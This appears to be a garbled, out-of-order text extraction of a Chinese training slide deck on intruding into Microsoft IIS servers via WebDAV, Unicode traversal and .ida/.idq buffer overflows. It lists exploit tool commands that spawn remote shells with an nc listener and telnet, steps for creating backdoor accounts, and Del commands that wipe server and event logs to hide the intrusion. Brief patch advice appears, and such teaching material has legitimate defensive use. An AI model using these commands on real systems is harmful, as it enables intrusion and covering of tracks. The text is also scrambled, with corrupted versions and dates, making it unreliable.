【正文】 止對 Inter請求的相應(yīng)或執(zhí)行任意命令。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training WindowsMedia服務(wù) 沖區(qū)溢出漏洞 ? 影響系統(tǒng)： windows 2023/2023 ? 描述： Microsoft Windows媒體服務(wù)，支持通過多播流從網(wǎng)絡(luò)上傳送媒體內(nèi)容給客戶端。通常來說， dos不需要遠程服務(wù)器存在任何漏洞，完全是惡意攻擊，入侵者得不到任何權(quán)限。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training Neusoft Institute of Information 2023年 9月 2日 IT Education Training 實例 ? 使用 Webdavx3對中文版的 IIS5進行WebDAV漏洞溢出 – 使用 WebDAVScan掃描 WebDAV漏洞 – 使用 Webdavx3對遠程 IIS5進行溢出 – 使用 tel或者 nc遠程登錄服務(wù)器 – 建立后門賬號 – 退出 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 安全解決方案 ? 安裝微軟提供的相關(guān)補丁 Neusoft Institute of Information 2023年 9月 2日 IT Education Training WebDAV超常請求遠程拒絕服務(wù)攻擊漏洞 ? Microsoft IIS WebDAV超常請求遠程拒絕服務(wù)攻擊漏洞 ? 影響系統(tǒng)： ? 描述： WebDAV的支持，WebDAV可以通過 HTTP向用戶提供遠程文件存儲的服務(wù)。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 漏洞檢測 ? WebDAVScan是紅盟編寫的專門用于檢測 WebDAV漏洞的專用掃描器，可以掃描一個 IP段，并可以返回遠程服務(wù)的 Web服務(wù)器版本。 ? 該漏洞可以使 win200產(chǎn)生緩沖區(qū)溢出并以IWAM_putername用戶的權(quán)限執(zhí)行任意代碼。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 實例 2：擦腳印 ? 在客戶端 IE瀏覽器中利用 Unicode編碼漏洞，使用下列命令清除日志文件： – Del+c:\winnt\system32\logfiles\*.* – Del+c:\winnt\system32\config\*.evt – Del+c:\winnt\system32\dtclog\*.* – Del+c:\winnt\system32\*.log – Del+c:\winnt\system32\*.txt – Del+c:\winnt\*.txt – Del+c:\winnt\*.log Neusoft Institute of Information 2023年 9月 2日 IT Education Training 實例 3： Unicode綜合利用 ? ASP工具 —海陽頂端網(wǎng)木馬，是一套 asp在線的網(wǎng)頁編輯軟件，支持在線更改、編輯、刪除任意文本文件，是無組件 asp上傳。不過Unicode漏洞并不是遠程溢出漏洞，不能拿到管理員權(quán)限的 shell，只能進行簡單的文件類操作。因此只要入侵者能夠狗仔出適當(dāng)?shù)淖址纭?/‖ ―\‖，就可以利用“ ../‖來遍歷與 Web根目錄處在一個邏輯驅(qū)動器上的目錄，從而導(dǎo)致“非法遍歷 ‖。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 安全解決方案 ? 打補丁，微軟已經(jīng)發(fā)布了針對該漏洞的補丁 Neusoft Institute of Information 2023年 9月 2日 IT Education Training Unicode目錄遍歷漏洞 ? 微軟 Unicode目錄遍歷漏洞 ? 影響系統(tǒng)： win2023 及 ? 都存在利用擴展 Unicode字符取代“ /‖和“ \‖而能利用“ ../‖目錄遍歷的漏洞。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 入侵實例 ? 使用 [nc –l –p 250]在本地開一個監(jiān)聽端口 ? 使用 [iis5exploit TIP LIP LPort]對遠程主機進行漏洞溢出。該攻擊可以使 Web服務(wù)器停止響應(yīng)。當(dāng)遠程服務(wù)器溢出后，便會在指定的端口得到一個Tel權(quán)限 ? Idahack host port type shellport ? 類型： ? 中文 win200 1 ? 中文 win200 sp1 2 ? 中文 win200 sp2 3 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 入侵思路 ? 掃描遠程服務(wù)器，先用 Xscan掃描，然后手工炎癥 ? 使用 [idahack IP 80 1 520]進行溢出 ? 成功后，使用 [tel IP 520]遠程登錄服務(wù)器 ? 使用上一章所講方法建立后門帳號 ? exit退出 Neusoft Institute of Information 2023年 9月 2日 IT Education Training IDQ入侵實例 ? IISIDQ是 snake編寫的 IDQ溢出工具，有命令行和圖形界面兩種方式，而且溢出成功后可以選擇兩種入侵方式 – Iisidq type ip port 1 lport [命令 1] – Iisidq type ip port 2 ip lport [命令 1] – 類型： ? 0iis5中文 win2023 ? 1iis5中文 win2023 sp1 ? 2iis5中文 win2023 sp2 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 溢出后的連接工具 nc ? Nc在網(wǎng)絡(luò)攻擊中素有 ―瑞士軍刀 ‖的美譽，是入侵者經(jīng)常使用的工具之一。 Neusoft Institute of Information 2023年 9月 2日 IT Education Training ? 關(guān)于溢出漏洞 – .ida.idq漏洞 – Painter漏洞 – Unicode漏洞 – .asp映射分塊編碼漏洞 ? Webdav漏洞 ? 關(guān)于擴展引發(fā)的漏洞 – Windows Media服務(wù) 洞 – Microsoft Frontpage Server Extensions遠程緩沖區(qū)溢出漏洞 Neusoft Institute of Information 2023年 9月 2日 IT Education Training 搜集 IIS信息 ? 通過 [tel 目標(biāo) IP 80]搜集 Web服務(wù)器版本信息 ? 在 tel連上之后需要連敲兩次回車才能得到信息 ? 通過 [tel 目標(biāo) IP 21]搜集 FTP服務(wù)器版本信息 Neusoft Institute of Information 2023年 9月 2日 IT Education Training .ida.idq漏洞 ? 漏洞描述 ? IIS的 index server .ida/.idq ISAPI擴展存在緩沖區(qū)溢出漏洞 ? 影響系統(tǒng) ? Index Server可以加快 Web的搜索能力，提供對管理員腳本和 Inter數(shù)據(jù)的查詢，默認支持管理腳本 .ida和查詢腳本 .idq，不過都是使用 。通過 IIS， windows系統(tǒng)可以方便的提供 Web服務(wù)、 FTP服務(wù)和 SMTP服務(wù)等。Neusoft Institute of Information 2023年 9月 2日 IT Education Training 基于服務(wù)器軟件漏洞的入侵 ? 隨著計算機應(yīng)用的進一步普及和計算機網(wǎng)絡(luò)的高速